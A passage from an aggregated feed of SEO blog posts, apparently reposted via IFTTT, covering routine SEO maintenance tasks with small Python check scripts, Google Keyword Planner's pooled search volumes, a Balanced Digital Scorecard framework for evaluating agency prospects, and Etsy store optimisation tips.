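    img.thumbnail(MAX_SIZE)         # shrinks in place, preserving aspect ratio
    img.save(os.path.join(OUTPUT_DIR, name), optimize=True, quality=80)
    print(f"{name}: resized to {img.size}")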

4. Check the proper canonicalization of your domain

Are you aware that your site may exist in two different places? Without even knowing it, Google could be indexing your content from both www.example.com and example.com and therefore you may be cannibalising your own pages in search.

Luckily it doesn’t take very long to fix this problem.

You just have to tell Google which is the preferred version of your domain for all future crawls of your site and indexing refreshes.

As it states on their webmaster help page:

If you specify your preferred domain as http://www.example.com and we find a link to your site that is formatted as http://example.com, we follow that link as http://www.example.com instead. In addition, we’ll take your preference into account when displaying the URLs.

To change this, visit Search Console, click on your site, click the gear icon then click Site Settings. And in the Preferred domain section, select the option you want.
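
Before and after changing the setting, it's worth sanity-checking how both versions of the domain actually respond. A quick sketch, assuming Python with requests; example.com stands in for your own domain.

import requests

# Placeholder domain - substitute your own
variants = [
    "http://example.com/",
    "http://www.example.com/",
]

for url in variants:
    response = requests.get(url, allow_redirects=False, timeout=10)
    location = response.headers.get("Location", "-")
    print(f"{url} -> status {response.status_code}, redirects to: {location}")

# Ideally one variant 301-redirects to the other, so Google only ever
# sees a single version of each page.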

5. Verify your Google My Business page, make sure your details are up to date

Kevin Gibbons wrote some good suggestions for us when it comes to optimising your page for local search:

  • Claim your listing, as often many people don’t.
  • Ensure your details are up-to-date (previously you might not have accepted credit cards).
  • Double check your opening hours and phone number, as these often change over time or when the business has new owners or management.
  • Check the business images you are using and consider refreshing them or uploading higher res versions.
  • Check no one has made an edit to your listing and changed the business's website to their affiliate link; we have seen this too!

There are loads more tips here: How to optimise your Google My Business listing.

6. Check that you don’t have any duplicate meta description and title tags

This is a very easy one. Just head back into Search Console, click on Search Appearance>HTML Improvements, then you can see exactly which of your pages contain duplicate metadata and you can alter accordingly.

[Screenshot: Search Console HTML Improvements]
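
If you want to double-check outside of Search Console, you can crawl a list of your URLs and group them by title tag. A rough sketch, assuming Python with requests and a hand-maintained URL list (in practice you might pull the list from your sitemap):

import re
from collections import defaultdict

import requests

# Placeholder URLs - in practice, pull these from your sitemap
urls = [
    "https://www.example.com/",
    "https://www.example.com/about/",
    "https://www.example.com/contact/",
]

pages_by_title = defaultdict(list)

for url in urls:
    html = requests.get(url, timeout=10).text
    match = re.search(r"<title>(.*?)</title>", html, re.IGNORECASE | re.DOTALL)
    title = match.group(1).strip() if match else "(no title tag)"
    pages_by_title[title].append(url)

for title, pages in pages_by_title.items():
    if len(pages) > 1:
        print(f"Duplicate title '{title}' used on: {', '.join(pages)}")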

7. Keep on top of your image alt tags

Google Image Search can drive a significant amount of traffic to your site; however, you must remember that Google can't 'see' your images, but it can 'read' them.

Therefore describing your images accurately and concisely in the ‘alt text or tag’ section is very important.

Check back through your last handful of pages and make sure your images conform.

[Screenshot: WordPress photo upload, highlighting the caption and description fields]

You could even look at the alt tags at the same time as checking your image file sizes (see point 3).

For lots more information, check out How to optimise images for SEO.
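
If your last handful of pages is more like a last hundred, the same spot-check can be scripted. A minimal sketch using Python's built-in HTML parser (plus requests) to flag images with missing or empty alt text; the URL is a placeholder.

from html.parser import HTMLParser

import requests

class AltChecker(HTMLParser):
    # Collects the src of any img tag with a missing or empty alt attribute
    def __init__(self):
        super().__init__()
        self.missing_alt = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        attrs = dict(attrs)
        if not attrs.get("alt"):
            self.missing_alt.append(attrs.get("src", "(no src)"))

url = "https://www.example.com/some-post/"    # placeholder page to audit
checker = AltChecker()
checker.feed(requests.get(url, timeout=10).text)

for src in checker.missing_alt:
    print(f"Missing alt text: {src}")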

8. Check your 404 error codes

404 pages occur when a Googlebot attempts to visit a page that doesn’t exist. Generally 404 pages are fine and won’t harm your rankings, but it is important to pay attention to them, especially if there’s a sudden increase.

You can check these in Search Console, under Crawl>Crawl Errors.

Then if anything looks to have been deleted accidentally, or a 301 redirect hasn’t been put in place properly, you can fix these straight away.
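
Alongside the Search Console report, it only takes a moment to spot-check URLs you've recently deleted or redirected. A short sketch, assuming Python with requests; the URLs are placeholders.

import requests

# Placeholder URLs - old pages you expect to redirect or still resolve
urls_to_check = [
    "https://www.example.com/old-page/",
    "https://www.example.com/deleted-category/",
]

for url in urls_to_check:
    response = requests.get(url, allow_redirects=True, timeout=10)
    if response.status_code == 404:
        print(f"404: {url} - add a 301 redirect or reinstate the page")
    elif response.history:
        print(f"Redirects: {url} -> {response.url} ({response.status_code})")
    else:
        print(f"OK ({response.status_code}): {url}")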

9. Keep on top of your internal linking

Regular and consistent internal linking to the most popular articles on your site is a key way to show search engines that your site has authority and that your content is ‘trusted’.

There are many different methods and tools to check which of your pages is the most popular for any search phrase, and therefore the ones you should be using to internally link for added SEO benefit.

Spend some time going back through your posts and ensuring that each post has a few internal links, paying particular attention to the anchor text used, and making sure they’re all relevant AND pointing towards pages you wish to see rank.

There’s an excellent, detailed best practice guide here: Internal linking for SEO.

So there you go. Nine quick things you can do to improve your SEO every day without taking up too much of your energy. Obviously this is far from an exhaustive list, but it’s definitely a start to getting the basics right.



from SEO – Search Engine Watch http://ift.tt/297vOPx
via IFTTT

Google’s Keyword Planner tool just became even more inaccurate

You’re probably familiar with the Keyword Planner tool, which is one of the best sources we have to spot opportunities and make the business case for an investment into paid or organic search campaigns.

One of the things it provides is guidance on the volume of searches for any given query. The numbers reported in the tool have always been somewhat vague. They are rounded up and numbers end with at least one zero. A pinch of salt has always been required when digesting the data.

It turns out that these numbers are now even more imprecise.

Jennifer Slegg spotted that Google has started to combine related terms, pooling them all together and reporting one (bigger) number.

No longer can you separate the data for keyword variants, such as plurals, acronyms, words with spaces, and words with punctuation.

As such it would be easy to get a false impression of search volumes, unless you’re aware of the change. No sudden jump in search queries, just an amalgamated number. Be warned.

Here are a couple of examples…

Bundling together acronyms and regional spellings


Lumping together plurals and phrases without spaces


The problem could be exacerbated by third party tools. Jennifer says:

“For those that don’t notice the change – or worse, pulling the data from tools that haven’t updated to take into account the change – this means that some advertisers and SEOs are grossly overestimating those numbers, since many tools will combine data, and there is no notification alert on the results to show that how Google calculates average monthly searches has been changed.”

So yeah, this isn’t exactly good news. In fact, I can’t think of any benefit to the end user, but Google has a history of obfuscating data, so perhaps it shouldn’t come as a surprise.

That said, it once again pushes the focus towards relevance and context rather than pure volume. Advertisers and content creators would do well to focus on optimising clickthrough rate and landing page performance, rather than just shotgun marketing.

Guesstimated data aside, you can use Search Console to make sense of actual performance. Map your page impressions to organic (or paid) positions and you’ll get a sense of how accurate the Keyword Planner data is for any given term.

It’s also worth remembering that there are seasonal factors at play with the reported data. Volumes shown are an approximate figure based on 12 months of search data. You might get a better idea of accurate monthly figures if you cross-reference the data with Google Trends, which will show seasonal spikes (February is a big month for flowers).


Keyword Planner replaced Google’s Keyword Tool and Traffic Estimator about three years ago. Users of the old tools initially complained about missing the broad match and phrase match options. Now, they’re going to miss even more detail around keywords and data.

Proceed with caution, as ever.



from SEO – Search Engine Watch http://ift.tt/294CXmq
via IFTTT

Google Launches New Google Partner Badges & Adds Premier Partner

Google is introducing brand new Partner badges for advertisers and is launching a new Premier Partner status as well. But what is most notable for many is that Google has finally added information to the Google Partners badge which shows that the badge is for advertising. While it doesn’t show it on the regular view, […]

The post Google Launches New Google Partner Badges & Adds Premier Partner appeared first on The SEM Post.



from The SEM Post http://ift.tt/293dDbu
http://ift.tt/eA8V8J via IFTTT

The Balanced Digital Scorecard: A Simpler Way to Evaluate Prospects

Posted by EmilySmith

[Estimated read time: 10 minutes]

As anyone who's contributed to business development at an agency knows, it can be challenging to establish exactly what a given prospect needs. What projects, services, or campaigns would actually move the needle for this organization? While some clients come to an agency with specific requests, others are looking for guidance — help establishing where to focus resources. This can be especially difficult, as answering these questions often requires large amounts of information to be analyzed in a small period of time.

To address the challenge of evaluating prospective clients and prioritizing proposed work, we’ve developed the Balanced Digital Scorecard framework. This post is the first in a two-part series. Today, we'll look at:

  • Why we developed this framework,
  • Where the concept came from, and
  • Specific areas to review when evaluating prospects

Part two will cover how to use the inputs from the evaluation process to prioritize proposed work — stay tuned!

Evaluating potential clients

Working with new clients, establishing what strategies will be most impactful to their goals... this is what makes working at an agency awesome. But it can also be some of the most challenging work. Contributing to business development and pitching prospects tends to amplify this with time constraints and limited access to internal data. While some clients have a clear idea of the work they want help with, this doesn’t always equal the most impactful work from a consultant's standpoint. Balancing these needs and wants takes experience and skill, but can be made easier with the right framework.

The use of a framework in this setting helps narrow down the questions you need to answer and the areas to investigate. This is crucial to working smarter, not harder — words which we at Distilled take very seriously. Often when putting together proposals and pitches, consultants must quickly establish the past and present status of a site from many different perspectives.

  • What type of business is this and what are their overall goals?
  • What purpose does the site serve and how does it align with these goals?
  • What campaigns have they run and were they successful?
  • What does the internal team look like and how efficiently can they get things done?
  • What is the experience of the user when they arrive on the site?

The list goes on and on, often becoming a vast amount of information that, if not digested and organized, can make putting the right pitch together burdensome.

To help our consultants understand both what questions to ask and how they fit together, we've adapted the Balanced Scorecard framework to meet our needs. But before I talk more about our version, I want to briefly touch on the original framework to make sure we’re all on the same page.


The Balanced Scorecard

For anyone not familiar with this concept, the Balanced Scorecard was created by Robert Kaplan and David Norton in 1992. First published in the Harvard Business Review, Kaplan and Norton set out to create a management system, as opposed to a measurement system (which was more common at that time).

Kaplan and Norton argued that "the traditional financial performance measures worked well for the industrial era, but they are out of step with the skills and competencies companies are trying to master today." They felt the information age would require a different approach, one that guided and evaluated the journey companies undertook. This would allow them to better create "future value through investment in customers, suppliers, employees, processes, technology, and innovation."

The concept suggests that businesses be viewed through four distinct perspectives:

  • Innovation and learning – Can we continue to improve and create value?
  • Internal business – What must we excel at?
  • Customer – How do customers see us?
  • Financial – How do we look to shareholders?

Narrowing the focus to these four perspectives reduces information overload. “Companies rarely suffer from having too few measures,” wrote Kaplan and Norton. “More commonly, they keep adding new measures whenever an employee or a consultant makes a worthwhile suggestion.” By limiting the perspectives and associated measurements, management is forced to focus on only the most critical areas of the business.

This image below shows the relations of each perspective:

[Image: the four perspectives of the Balanced Scorecard]

And now, with it filled out as an example:

[Image: an example Balanced Scorecard with goals and measures]

As you can see, this gives the company clear goals and corresponding measurements.

Kaplan and Norton found that companies solely driven by financial goals and departments were unable to implement the scorecard, because it required all teams and departments to work toward central visions — which often weren’t financial goals.

“The balanced scorecard, on the other hand, is well suited to the kind of organization many companies are trying to become... put[ting] strategy and vision, not control, at the center,” wrote Kaplan and Norton. This would inevitably bring teams together, helping management understand the connectivity within the organization. Ultimately, they felt that “this understanding can help managers transcend traditional notions about functional barriers and ultimately lead to improved decision-making and problem-solving.”

At this point, you’re probably wondering why this framework matters to a digital marketing consultant. While it's more directly suited for evaluating companies from the inside, so much of this approach is really about breaking down the evaluation process into meaningful metrics with forward-looking goals. And this happens to be very similar to evaluating prospects.

Our digital version

As I mentioned before, evaluating prospective clients can be a very challenging task. It’s crucial to limit the areas of investigation during this process to avoid getting lost in the weeds, instead focusing only on the most critical data points.

Since our framework is built for evaluating clients in the digital world, we have appropriately named it the Balanced Digital Scorecard. Our scorecard also has main perspectives through which to view the client:

  1. Platform – Does their platform support publishing, discovery, and discoverability from a technical standpoint?
  2. Content – Are they publishing content that combines an appropriate blend of effective, informative, entertaining, and compelling material?
  3. Audience – Are they building visibility through owned, earned, and paid media?
  4. Conversions – Do they have a deep understanding of the needs of the market, and are they creating assets, resources, and journeys that drive profitable customer action?
  5. Measurement – Are they measuring all relevant aspects of their approach and their prospects’ activities to enable testing, improvement, and appropriate investment?

These perspectives make up the five areas of analysis to work through when evaluating most prospective clients.

1. Platform

Most consultants or SEO experts have a good understanding of the technical elements to review in a standard site audit. A great list of these can be found on our Technical Audit Checklist, created by my fellow Distiller, Ben Estes. The goal of reviewing these factors is, of course, to “ensure site implementation won’t hurt rankings,” says Ben. While you should definitely evaluate these elements (at a high level), there is more to look into when using this framework.

Evaluating a prospect’s platform does include standard technical SEO factors but also more internal questions, like:

  • How effective and/or differentiated is their CMS?
  • How easy is it for them to publish content?
  • How differentiated are their template levels?
  • What elements are under the control of each team?

Additionally, you should look into areas like social sharing, overall mobile-friendliness, and site speed.

If you’re thinking this seems like quite an undertaking, because technical audits take time and some prospects won’t be open about platform constraints, you’re right (to an extent). Take a high-level approach and look for massive weaknesses rather than cataloguing every single limitation. This will give you enough information to understand how to prioritize this perspective in the pitch.
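
To make that concrete, here is a minimal sketch of the kind of high-level spot check you might script when all you have is a handful of public URLs. It only looks at a few obvious signals (status code, response time, title length, meta robots, canonical, and a viewport tag as a rough mobile proxy); the URL is a placeholder, and this is nowhere near a full technical audit.

import requests
from bs4 import BeautifulSoup

def platform_spot_check(url):
    # Fetch the page and pull out a few high-level signals.
    resp = requests.get(url, timeout=10)
    soup = BeautifulSoup(resp.text, "html.parser")

    title = soup.title.get_text(strip=True) if soup.title else ""
    robots = soup.find("meta", attrs={"name": "robots"})
    canonical = soup.find("link", rel="canonical")
    viewport = soup.find("meta", attrs={"name": "viewport"})

    return {
        "status_code": resp.status_code,                              # anything but 200 deserves a closer look
        "response_seconds": round(resp.elapsed.total_seconds(), 2),   # very crude speed proxy
        "title_length": len(title),
        "meta_robots": robots.get("content") if robots else None,     # watch for a stray "noindex"
        "canonical": canonical.get("href") if canonical else None,
        "has_viewport_meta": viewport is not None,                    # rough mobile-friendliness signal
    }

# Placeholder URL; run this over a handful of the prospect's key templates.
print(platform_spot_check("https://www.example.com/"))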

2. Content

As with the technical section, evaluating content looks like a lightweight version of a full content audit. What content do they have, which pieces are awesome, and what is missing? Also look to competitors to understand who is creating content in the space and where the bar is set.

Beyond looking at these elements through a search lens, aim to understand what content is being shared and why. Is this taking place largely on social channels, or are publications picking these pieces up? Evaluating content on multiple levels helps to understand what they've created in the past and their audience’s response to it.

3. Audience

Looking into a prospect’s audience can be challenging, depending on how much access they grant you during the pitch process. If you’re able to get access to analytics, this task is much easier; without it, there are many tools you can leverage to get some of the same insights.

In this section, you’re looking at the traffic the site is receiving and from where. Are they building visibility through owned, earned, and paid media outlets? How effective are those efforts? Look at metrics like Search Visibility from SearchMetrics, social reach, and email stats.

A large amount of this research will depend on what information is available or accessible to you. As with previous perspectives, you're just aiming to spot large weaknesses.

4. Conversions

Increased conversions are often a main goal stated by prospects, but without transparency from them, this can be very difficult to evaluate during a pitch, which often leaves you to speculate or rely on basic approaches. How difficult or simple is it to buy something, contact them, or complete a conversion in general? Are there clear calls to action for micro-conversions, such as joining an email list? How different is the mobile experience of this process?

Look at the path to these conversions. Is there a clear funnel, and does it make sense from a user’s perspective? Understanding the journey a user takes (which you can generally experience first-hand) can tell you a lot about expected conversion metrics.

Lastly, many companies’ financials are available to the public and offer a general idea of how the company is doing. If you can establish how much of their business takes place online, you can start to speculate about the success of their web presence.

5. Measurement

Evaluating a prospect’s measurement capabilities is (not surprisingly) vastly more accurate with analytics access. If you’re granted access, evaluate each platform not just for validity but also accessibility. Are there useful dashboards, management data, or other data sources that teams can use to monitor and make decisions?

Without access, you’re left to check for the presence of an analytics snippet and a data layer. While this doesn’t tell you much, you can often deduce from conversations how much data factors into the internal team’s thought process. If people are monitoring, engaging with, and interested in analytics data, changes and prioritization might be an easier undertaking.
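
As a rough sketch of that presence check (assuming only the public page source is available to you), you can scan the HTML for common analytics signatures and a dataLayer. The signatures below are just the usual suspects for illustration, not an exhaustive or authoritative list.

import requests

# Illustrative signatures only; real measurement stacks vary widely.
SIGNATURES = {
    "google_analytics_or_gtag": ("gtag(", "google-analytics.com", "analytics.js"),
    "google_tag_manager": ("googletagmanager.com",),
    "data_layer": ("dataLayer",),
    "adobe_analytics": ("AppMeasurement", "s_code.js"),
}

def detect_measurement(url):
    # Scan the raw HTML for each signature and report what was found.
    html = requests.get(url, timeout=10).text
    return {name: any(token in html for token in tokens)
            for name, tokens in SIGNATURES.items()}

print(detect_measurement("https://www.example.com/"))  # placeholder URL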

[Image: quote about what you measure]

Final thoughts

Working with prospective clients is something all agency consultants will have to do at some point in their career. This process is incredibly interesting — it challenges you to leverage a variety of skills and a range of knowledge to evaluate new clients and industries. It's also a daunting task. Often your position outside the organization or unfamiliarity with a given industry can make it difficult to know where to start.

Frameworks like the original Balanced Scorecard created by Kaplan and Norton were designed to help a business evaluate itself from a more modern and holistic perspective. This approach turns the focus to future goals and action, not just evaluation of the past.

This notion is crucial at an agency needing to establish the best path forward for prospective clients. We developed our own framework, the Balanced Digital Scorecard, to help our consultants do just that. By limiting the questions you’re looking to answer, you can work smarter and focus your attention on five perspectives to evaluate a given client. Once you've reviewed these, you’re able to identify which ones are lagging behind and prioritize proposed work accordingly.

Next time, we’ll cover the second part: how to use the Balanced Digital Scorecard to prioritize your work.

If you use a framework to evaluate prospects or have thoughts on the Balanced Digital Scorecard, I’d love to hear from you. I welcome any feedback and/or questions!





from The Moz Blog http://ift.tt/2938Jx7
via IFTTT

Tuesday 28 June 2016

SEO for Etsy: three tips to improve your store’s search visibility

We live in the age of personalization and customization.

Businesses are trying to find ways to personalize their services to better connect with overarching trends. With the Internet at your disposal, you can have a custom shirt with your dog’s face on it and also get a shirt for your dog with your face on it.

This is just one example of the growing customization culture and interest in the weird, which has caused an uptick in the number of Etsy stores out there.

As of 2014, Etsy had 54 million users, up from just 5 million users in 2004, and 1.4 million of those users are active sellers. As more Etsy stores pop up, the space becomes more competitive.

[Image: Etsy user growth trend]

Optimizing your Etsy store and products will help you stay visible whether customers search on Etsy or on Google. Here are the fundamental tips and tricks to help you enhance your Etsy store and product listings, increase traffic from Google, and drive sales.

Etsy keyword research

Understanding the keywords your customers use to find a business like yours is beyond powerful, and it can help potential clients and fans find you.

Marmalead is a great tool to find keywords for Etsy shops. With it you can type in a tag (or keyword) and see total results or competing products and shops, total views, average views per week, average favorites per week, and much more.

For a more in-depth explanation of this tool and how to use it for keywords, check out the Ultimate Etsy SEO Guide on Marketing Artfully.

[Image: Marmalead keyword results for “dog beds”]

Another free option to find keywords for your business – whether you’re a painter or sell custom koozies – is the Google Keyword Planner Tool.

In the Keyword Planner, you can enter one or multiple keywords and Google will give you a rough estimate of how many searches there are each month, the level of competition, the suggested bid (if you were running an AdWords campaign), and related keywords.

This provides insight into how people are searching for products related to what you offer.

Let’s say you sell celebrity prayer candles, which I hope you do. Instead of using the keyword “celebrity prayer candles”, you can also try “celebrity candles” or even “funny prayer candles.”

[Image: Google Keyword Planner results]

Although “celebrity prayer candles” may be your exact item, there is an opportunity to take a top spot for “funny prayer candles,” since no shops are currently optimized around it (see the screenshot below).

Keywords with lower search volume, less competition, and a specific relationship to your products may be better choices for pulling in relevant traffic.

Slight variations in keywords can make all the difference, and having keywords at your disposal is great ammunition, whether you have an Etsy shop or a blog on a WordPress site. You need to know what people are looking for and how to reach them.

Make sure to keep a list of applicable keywords ready whenever you are creating a new product listing.

Optimize your Etsy shop for Etsy and Google… but also your customers

You’ve got those awesome keywords at your disposal. Now it’s time to use them!

The coolest thing keywords can do is show you how people are actually searching for your items. Instead of guessing in the dark, you can use terms that potential customers are using to find your products.

Optimizing both your shop and your products is essential to being found on Google and getting people to click through. Let’s return to our favorite prayer candle example.

[Image: Google search results for “celebrity prayer candles”]

Above are the top two results for ‘celebrity prayer candles’. The first result has a meta description that is the proper length and tells you about the business, but the business name is cut off from the page title.

On the other hand, the second result has the business name in the page title (but before the keyword) and the meta description is loaded with too much information and is not succinct.

A page title should be a maximum of 65 characters, and the meta description should be a maximum of 140 characters. Your page title/store title should quickly summarize what your business does and its name.

A better page title for the first Etsy store might be “Celebrity Prayer Candles | Granny’s Hope Chest”. This title is short, but lets you know what the store offers and what it’s called.

A great tool to preview what your shop title and announcement will look like is the Google SERP Snippet Optimization Tool.
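
If you would rather check lengths in bulk than eyeball them, a tiny script along these lines will flag likely truncation, using the 65- and 140-character limits mentioned above. The sample title and description are made up for illustration.

# Limits discussed above: roughly 65 characters for a page title,
# 140 for a meta description.
TITLE_LIMIT = 65
DESCRIPTION_LIMIT = 140

def check_listing(title, description):
    issues = []
    if len(title) > TITLE_LIMIT:
        issues.append(f"Title is {len(title)} characters (over {TITLE_LIMIT}); it may be cut off.")
    if len(description) > DESCRIPTION_LIMIT:
        issues.append(f"Description is {len(description)} characters (over {DESCRIPTION_LIMIT}).")
    return issues or ["Within limits."]

# Made-up example listing, echoing the store above.
print(check_listing(
    "Celebrity Prayer Candles | Granny's Hope Chest",
    "Hand-poured celebrity prayer candles and funny gifts for the pop culture devotee in your life.",
))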

Optimize your Etsy product listings

If you’re trying to move a specific product on Etsy, then you need to optimize: 1) the product title, 2) tags, 3) the first sentence of the product description, and 4) categories and materials.

Google pulls this information to create what shows up in search engine result pages, so optimizing properly can help boost traffic on specific products.

The Etsy product title is what Google uses for your listing’s title tag, H1 tag, and image alt tag on each page, so make it informative and keyword-optimized.

[Image: Etsy product listing optimization]

Scott Taft does a great job of further explaining how your Etsy store translates on Google.

Let’s say you not only create celebrity prayer candles, but you really kick it up a notch and specifically create Steve Buscemi prayer candles.

Yes, there are an average of 30 searches a month for “Steve Buscemi Prayer Candle,” according to Google Keyword Planner. Since Buscemi prayer candles are a little more popular than you would imagine, optimizing your product listing for both Etsy and Google can make a big difference in separating your Steve candles from the rest of the celebrity candle pack.

[Image: Steve Buscemi prayer candle listing]

Again, make sure your product title uses a keyword before your business name and is 65 characters or less.

In this case, if someone is looking for a Steve Buscemi prayer candle then chances are they have a pretty good sense of humor, so your product description should be written to draw a potential customer in with witty copy.

The meta description pulls the first sentence from your product description (as Scott Taft points out in the image below). Remember to keep that sentence close to 120 characters and include the same keyword from your page title, if possible.

[Image: Etsy meta description example]

Using the keyword ‘Steve Buscemi prayer candle’, I created a keyword-focused page title and meta description that is clear, concise, and may appeal to Buscemi fans. The page title/title description is 55 characters and the product/meta description is 116 characters.

Creating Etsy product titles/page titles and meta/product descriptions that are keyword focused, informative, and fun can help an artist stay visible on Google.

[Image: optimized Etsy listing in Google search results]

Implementing a keyword strategy may seem confusing and monotonous at first, but it will eventually become routine and is sure to yield results.

Understanding how people search for and see your shop and products is essential to performing well as the customized market grows. When it comes to SEO, try to think like a human first and a search engine second.

No matter what you’re selling, take a few minutes to think about how you would be searching for your product on a search engine and then use the tools and tips to create a strategy. A competitive space isn’t a bad thing when you understand your audience and how to reach them.

Maddie Silverstein is an SEO Analyst at DigitasLBi and a contributor to SEW. You can connect with Maddie on Twitter: @maddigler.



from SEO – Search Engine Watch http://ift.tt/290Zj38
via IFTTT

Social Media Today